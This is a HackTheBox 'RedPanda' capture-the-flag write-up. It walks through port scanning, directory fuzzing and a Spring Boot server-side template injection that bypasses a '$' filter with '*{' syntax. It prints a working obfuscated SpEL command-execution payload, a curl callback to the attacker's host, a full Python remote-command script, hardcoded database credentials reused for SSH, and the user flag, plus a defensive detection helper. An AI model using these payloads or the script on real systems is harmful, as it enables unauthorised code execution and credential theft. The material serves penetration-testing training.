Hackthebox - RedPanda

Machine Info

Machine Type

Information Gathering

Nmap

nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.170

Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-23 09:15 CST
Nmap scan report for 10.10.11.170
Host is up (0.41s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Sun, 23 Oct 2022 01:16:00 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en" dir="ltr">
|     <head>
|     <meta charset="utf-8">
|     <meta author="wooden_k">
|     <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw -->
|     <link rel="stylesheet" href="css/panda.css" type="text/css">
|     <link rel="stylesheet" href="css/main.css" type="text/css">
|     <title>Red Panda Search | Made with Spring Boot</title>
|     </head>
|     <body>
|     <div class='pande'>
|     <div class='ear left'></div>
|     <div class='ear right'></div>
|     <div class='whiskers left'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='whiskers right'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='face'>
|     <div class='eye
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET,HEAD,OPTIONS
|     Content-Length: 0
|     Date: Sun, 23 Oct 2022 01:16:01 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sun, 23 Oct 2022 01:16:02 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_    Request</h1></body></html>
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Red Panda Search | Made with Spring Boot
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   537.83 ms 10.10.14.1
2   537.94 ms 10.10.11.170

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.28 seconds

HTTP

A pretty cute little red panda; it even blinks.

Below it there is a search box, so let's search for something and see what happens.

Judging by the interface, it really does query a database, which instinctively makes me suspect an injection.

Nothing turned up from testing, so let's try fuzzing.

Fuzz

 lucifiel@MacBookPro  ~  ffuf -u 'http://10.10.11.170:8080/FUZZ' -w /Users/lucifiel/Documents/Penetration/SecLists/Discovery/Web-Content/raft-medium-directories.txt -t 200

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.170:8080/FUZZ
 :: Wordlist         : FUZZ: /Users/lucifiel/Documents/Penetration/SecLists/Discovery/Web-Content/raft-medium-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

stats                   [Status: 200, Size: 987, Words: 200, Lines: 33, Duration: 619ms]
error                   [Status: 500, Size: 86, Words: 1, Lines: 1, Duration: 617ms]
search                  [Status: 405, Size: 117, Words: 3, Lines: 1, Duration: 616ms]
                        [Status: 200, Size: 1543, Words: 368, Lines: 56, Duration: 401ms]
:: Progress: [30000/30000] :: Job [1/1] :: 8724 req/sec :: Duration: [0:00:41] :: Errors: 10271 ::

There is a stats directory; let's take a look.

Some images are found here; let's try to read them.

The hint here confirms that there really is an injection, although, to be honest, this image is genuinely quite amusing.

But since SQL injection doesn't work, let's try SSTI; either way, we can be sure the vulnerability is an injection.

Found it by testing: the syntax is *{7*7}; replacing the $ in the SSTI expression with * is enough to bypass it.

Exploitation

From the nmap results we know that the site uses Spring Boot, so it is certainly a Java application.

So let's look through the SSTI payload collections for one.

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty

*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
woodenk:x:1000:1000:,,,:/home/woodenk:/bin/bash
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false

Successfully read the /etc/passwd file.

That works, but converting the format is a bit tedious, so I found another article.

https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssti-server-side-template-injection/el-expression-language.md

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("whoami")}

Executing it directly seems to return an error; let's start an HTTP server and test.

python3 -m http.server 80

Then change the command to make a request and see.

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://10.10.14.2")}

 lucifiel@MacBookPro  ~  python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.10.11.170 - - [23/Oct/2022 10:02:07] "GET / HTTP/1.1" 200 -

Let's just write an RCE script.

#!/usr/bin/python3
import requests
from cmd import Cmd
from bs4 import BeautifulSoup


print("""
 __          __    __       ______     __      _______     __      _______     __      
|  |        |  |  |  |     /      |   |  |    |   ____|   |  |    |   ____|   |  |     
|  |        |  |  |  |    |  ,----'   |  |    |  |__      |  |    |  |__      |  |     
|  |        |  |  |  |    |  |        |  |    |   __|     |  |    |   __|     |  |     
|  `----.   |  `--'  |    |  `----.   |  |    |  |        |  |    |  |____    |  `----.
|_______|    \______/      \______|   |__|    |__|        |__|    |_______|   |_______|

""")
class RCE(Cmd):
    prompt = "\033[1;31m$\033[1;37m "
    def decimal(self, args):
        # Build the SpEL payload character by character from code points,
        # following the PayloadsAllTheThings example above.
        comando = args
        decimales = []

        for i in comando:
            decimales.append(str(ord(i)))
        payload = "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)" % decimales[0]

        for i in decimales[1:]:
            payload += ".concat(T(java.lang.Character).toString({}))".format(i)

        payload += ").getInputStream())}"
        data = { "name": payload }
        requer = requests.post("http://10.10.11.170:8080/search", data=data)
        # The rendered result is echoed back inside the first <h2> element.
        parser = BeautifulSoup(requer.content, 'html.parser')
        grepcm = parser.find_all("h2")[0].get_text()
        result = grepcm.replace('You searched for:','').strip()
        print(result)

    def default(self, args):
        try:
            self.decimal(args)
        except Exception:
            print("%s: command not found" % (args))

RCE().cmdloop()

 lucifiel@MacBookPro  ~/Desktop  python3 exploip.py

 __          __    __       ______     __      _______     __      _______     __
|  |        |  |  |  |     /      |   |  |    |   ____|   |  |    |   ____|   |  |
|  |        |  |  |  |    |  ,----'   |  |    |  |__      |  |    |  |__      |  |
|  |        |  |  |  |    |  |        |  |    |   __|     |  |    |   __|     |  |
|  `----.   |  `--'  |    |  `----.   |  |    |  |        |  |    |  |____    |  `----.
|_______|    \______/      \______|   |__|    |__|        |__|    |_______|   |_______|


$ whoami
woodenk
$ id
uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk)
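As an added example, not part of the original writeup: the `*{7*7}` probe above shows that blocking only `$` is no defence, because Thymeleaf also evaluates `*{}`, `#{}`, `@{}` and `~{}`, and the RCE script shows the command being obfuscated as a `Character.toString(n).concat(...)` chain. The following Python triage helper (mine, not from the box or the script author) flags request parameters carrying any of those expression prefixes or the SpEL `T(...)`/reflection calls, and decodes the chain so an analyst can recover the command that was executed; the POST bodies are constructed samples.

```python
import re
from urllib.parse import parse_qs

# Thymeleaf evaluates five expression prefixes, so a filter that only blocks "$"
# is bypassed by "*{...}" (the trick used against this box). Match all of them.
EXPR_PREFIX = re.compile(r"[$*#@~]\{")
# SpEL constructs seen in the payloads above: T(type) references and reflection.
SPEL_DANGER = re.compile(r"\bT\(|getClass\(\)\.forName\(|getRuntime\(\)")
# Each character of the obfuscated command is emitted as Character.toString(<code point>).
CHAR_CALL = re.compile(r"T\(java\.lang\.Character\)\.toString\((\d+)\)")


def decode_char_chain(payload: str) -> str:
    """Rebuild the string hidden in a Character.toString(n).concat(...) chain."""
    return "".join(chr(int(n)) for n in CHAR_CALL.findall(payload))


def inspect_value(value: str) -> dict:
    """Classify one parameter value and, if obfuscated, recover the command for triage."""
    return {
        "expression": EXPR_PREFIX.search(value) is not None,
        "spel": SPEL_DANGER.search(value) is not None,
        "decoded": decode_char_chain(value),
    }


def scan_bodies(bodies):
    """Return one finding per suspicious form parameter in a list of (client, body) pairs."""
    hits = []
    for client, body in bodies:
        for param, values in parse_qs(body, keep_blank_values=True).items():
            for v in values:
                info = inspect_value(v)
                if info["expression"] or info["spel"]:
                    hits.append({"client": client, "param": param, **info})
    return hits


# Constructed sample of POST bodies to /search (not real traffic from the box).
SAMPLE_BODIES = [
    ("10.10.14.2", "name=red+panda"),
    ("10.10.14.2", "name=*{7*7}"),
    ("10.10.14.2", "name=*{T(java.lang.Character).toString(105).concat("
                   "T(java.lang.Character).toString(100))}"),
]

if __name__ == "__main__":
    for hit in scan_bodies(SAMPLE_BODIES):
        print(hit)
```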

Commands execute successfully, but this is still not as convenient as a shell, so let's first see whether there is anything that could get us a shell.

In the file /opt/panda_search/src/main/java/com/panda_search/htb/panda_search/MainController.java, I found a set of credentials.

conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/red_panda", "woodenk", "RedPandazRule");
username = woodenk
password = RedPandazRule

 lucifiel@MacBookPro  ~/Desktop  ssh woodenk@10.10.11.170
woodenk@10.10.11.170's password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-121-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 24 Oct 2022 03:15:10 AM UTC

  System load:           0.02
  Usage of /:            80.9% of 4.30GB
  Memory usage:          41%
  Swap usage:            0%
  Processes:             213
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.170
  IPv6 address for eth0: dead:beef::250:56ff:feb9:1c2


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Oct 24 03:14:58 2022 from 10.10.14.11
woodenk@redpanda:~$ whoami&&id
woodenk
uid=1000(woodenk) gid=1000(woodenk) groups=1000(woodenk)

Successfully obtained a shell as the user.

woodenk@redpanda:~$ cat user.txt
a00d4342cd040f667d3dbfee34a49451

Successfully obtained the user flag.